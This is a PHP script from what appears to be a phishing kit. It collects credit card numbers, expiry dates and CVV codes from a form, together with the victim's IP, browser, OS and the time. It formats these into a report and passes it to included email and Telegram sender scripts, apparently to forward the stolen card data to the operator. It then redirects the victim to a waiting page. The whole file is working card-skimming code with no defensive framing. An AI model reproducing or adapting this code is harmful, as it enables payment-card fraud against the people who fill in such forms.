<?php


session_start();

if(isset($_POST['number'])) 
{
    
include("system.php"); 
include("detect.php"); 

$InfoDATE   = date("d-m-Y h:i:sa");
$OS =getOS($_SERVER['HTTP_USER_AGENT']); 
$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);				
$_SESSION['browser'] = $browserTy_Version =array_pop($browser); 

$number = $_SESSION['number'] = $_POST['number'];
$month = $_SESSION['month'] = $_POST['month'];
$year = $_SESSION['year'] = $_POST['year'];
$ccv = $_SESSION['ccv'] = $_POST['ccv'];



$bincheck = $_POST['number'] ;
$bincheck = preg_replace('/\s/', '', $bincheck);


$Domin = $_SESSION['Domin'] = $_SERVER['HTTP_REFERER']; 
$rt = substr($Domin, 0, -9);
$rtt = ''.$rt.'/Select/Select.php' ;




$yagmai .= '
     [+]━━━【💳 CC INFO】━━[+]
[💳 CC Number] = '.$bincheck.'
[🔄 Expiry Date ]   = '.$_SESSION['month'].'/'.$_SESSION['year'].'
[🔑 CVV ] = '.$_SESSION['ccv'].'
       [+]━━━━【🌍 Select】━━━[+]
'.$rtt.'
       [+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';


$Page .= ' 
  ';

$fPage = fopen("../Select/Show_system/Show_Page.txt", "w");
    fwrite($fPage, $Page);


include("sand_email.php"); 
include("TelegramAPi.php");

$src="../Select/Waiting.php";
header("location:$src");

}

else {
$src="../Info.php";
header("location:$src");
}

?>

